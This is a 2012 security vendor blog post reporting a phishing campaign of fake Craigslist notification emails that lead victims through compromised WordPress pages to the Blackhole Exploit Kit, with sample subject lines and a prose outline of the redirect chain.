June 6, 2012

Malicious URLs in Fake Craigslist Emails

Ran Mosessco Principal Security Researcher

Today, Websense® Security Labs™ ThreatSeeker™ Network has seen a barrage of malicious emails pretending to be automated notifications from Craigslist. These emails instruct the recipient to click a link to complete a Craigslist request. The URLs in these emails redirect the user to malicious web sites hosting Blackhole Exploit Kit. So far we have seen over 150,000 of these emails in our Cloud Email Security portal. Websense Email Security and Websense Web Security protect against this kind of blended threat with ACE, our Advanced Classification Engine.


The emails have subject lines like:

POST/EDIT/DELETE : "Models for fine" (systems / network)

POST/EDIT/DELETE : "Studio4PaintWorkCatskills" (education)

POST/EDIT/DELETE : "Show Your Art" (cars+trucks)


The malicious emails are similar in appearance to legitimate Craigslist automated email notifications, including a legitimate looking sender address and name:


 Here we can see the headers and SMTP transaction, showing Craigslist sender address and mail server: 


Clicking on the link takes the victim to a compromised WordPress page containing obfuscated Java Script:


After deobfuscation, we can see an iFrame redirection to a malicious web site: 


The malicious website tries to exploit the victim's computer using vulnerabilities such as:




More details can be found  here.

The original links in the emails were detected by ACE in real-time using our Real-Time Security Scanner. In addition, we have increased the proactive detection of similar campaigns to our email security customers.


Ran Mosessco

Principal Security Researcher

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.